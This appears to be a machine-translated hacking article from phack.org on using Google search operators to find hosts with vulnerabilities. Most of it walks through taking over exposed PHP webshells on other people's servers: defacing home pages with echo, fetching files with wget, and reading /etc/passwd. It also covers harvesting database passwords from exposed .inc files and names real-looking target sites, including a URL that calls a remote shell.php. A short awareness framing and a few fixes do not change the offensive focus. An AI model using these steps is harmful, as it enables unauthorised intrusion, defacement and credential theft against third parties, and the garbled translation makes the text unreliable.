Author: zhaohuan@phack.org Source: www.phack.org
Technical World: GoogleHacking is the use of Google's search engine to quickly find the vulnerability host and information that contains sensitive data. The recent attacker for manual operation by hackers can be done by a new worm. In order to cause everyone to pay attention to GoogleHacking, we have made this article hopes that you can better protect your information security through your understanding of HACK's attack. In this paper, it is important in the understanding of GoogleHacking attack methods, and for details of the details of some attacks are not detailed.
Preface:
At the Blackhat conference held in Las Vegas in 2004, two security experts were named YOU Found That on Google and Google Attacks. After the security focus forum original master WLJ big brother, the individual feels that it is necessary to supplement some detail parts. Today, I'm telling you another feature: using search engines quickly finds hosts with vulnerability and information that contains sensitive data, and even direct fool invasion.
Use Google to perform "penetration test"
We often conduct information collection before implementing the attack, and then the vulnerability confirmation and the final vulnerability utilization, expand the results. Here we are here to talk about: First, use Google to find the host of the PHP Webshell back door, and test whether it can be used; Second, use Google to find exposed Inc sensitive information. OK, now we start:
1. Find the use of PHP WebShell
We fill in in Google's search box:
Code: INTITLE: "PHP shell *" "Enable stderr" FileType: PHP
(Note: INTITLE- Web Title Enable StderR-UNIX standard output and standard errors Abbreviation Filetype- file type). In the search results, you can find a lot of Web Shell directly on the machine to execute the command. If the PHPSHELL found will not be used, if you are not familiar with UNIX, you can look at the list directly, here is not detailed, there are a lot of use value. To explain, we can search for some foreign phpshells here to use the UNIX commands, all of which are SYSTEM calls (it can be used in Baidu and other search engines, just fill in the search for the search). Through my test, this phpwebshell is a direct Echo (UNIX common command). In one sentence, I get the home page:
Code: echo "Summary"> Index.jsp
Obtained
Code: ECHO /
After writing: "Summon"
Take a look at the home page now, it has been changed to: "Summon"
We can also use WGET to upload a file (such as the leaves you want to replace). Then Execute Command Enter Cat File> INDEX.HTML or Echo "> File
Echo "Test" >> File
Such a bar is playing, and the site's home page is successful. The same can also
Code: uname -a; cat / etc / passwd
However, I have to pay attention, some WebShell programs have problems, can't perform, such as http://www.Al3toof.com/card/smal ... c_html & command = http://ramsgaard.net/upload/shell.php
These stations's PHP is Global Register Off
Solution: We can use the related tools to search on the Internet. If information is abused, to http://www.google.com/remove.html Submit the information you want to delete, control the search engine robot's query. 2. Search INC sensitive information
We fill in in Google's search box:
Code: .org fileetype: inc
We can now search for INC information for the ORG domain site (because Google Shielded Search "COM" information, we can also search other GOV, CN, INFO, TW, JP, EDU, etc.)
PS: I am watching a number of PHP programmers like to write some normal code or configuration information, write in a .inc's file, such as shared.inc, global.inc, conn.inc, etc. This is a very good habit, including the PHP official website, but I don't know if you have noticed that there is a safety hazard problem. When I wrote a PHP code, I accidentally wrote a wrong sentence. When I viewed this PHP file in the browser, I found out that the screen was discovered in detail showing the PHP file path and code row. (PHP error display configuration is open. This feature is default in PHP!), This means that when we don't want to write wrong code (same .inc file is also the same) or PHP error display It is also open, the client's users will see the .inc files of the specific URL address, and the .url file is like TXT text, when browsing in the browser, there is no need to display its content without retaining, and Many sites have written important information such as user passwords in .inc files! Including domestic Haier and Jia Bell Motorcycle, I dare to announce because I have tested, http://www.haier.com / su *** / inc / conn.inc fettered database ID password can not be connected to the client, the website is closed 1215, and the firewall is also filtered.
Ok, after INC's knowledge, we will continue to search, find a way to expose the mysql password, and use the client to log in to modify the data. Here, the knowledge of the database, we don't talk too much, about " INC Exposure Sensitive Information "After you end here, certain ways we can solve it by some ways: 1. You can configure the .inc file to avoid the source file directly. 2. Of course, the better method is to add and change the file extension. PHP (PHP can be resolved) so that the client will not obtain the source file.
Here, I will expressed the picture drawn by FreeMind. For more information on Google Hack, help us analyze step-on-point connections:
Code: -:. * |
Operator:
"Foo1 foo2" FileType: 123 Site: foo.com intext: foo intitle: footitle allinarch: foo
Password related
"Index of" htpasswd / passwd filetype: XLS Username Password Email "ws_ftp.log" "config.php" AllinURL: Admin MDB Service FILETYPE: PWD (FrontPage)
Sensitive information:
Code: "robots.tx" "disallow:" filetype: txt inurl: _vti_cnf (frontpage files) allinurl: /msadc/samples/selector/showcode.aspallinurl: /examples/jsp/snp/snoop.jspallinurl: phpsysinfoipsec filetype: confintitle: "Error Occurred" ODBC Request Where (Select | Insert) "Mydomain.com" Report Generated BY "end:
If you want to take root permissions, you have to analyze it, but you have a shell permission. There are many articles on the Internet. You can also search for a lot of useful things by Google, but we can also search for many useful things. It is detail, and it is necessary to collect, expand, invade, invaded. These I will not analyze it. Give everyone a thinking, everyone slowly study it here, this article is to end, write this article The purpose is to cause everyone's attention and attention, understand the new HACK means, understand new protection methods, things have two sides, in today's Google's prevail, while fully utilizing Google. It should also be more comprehensive.
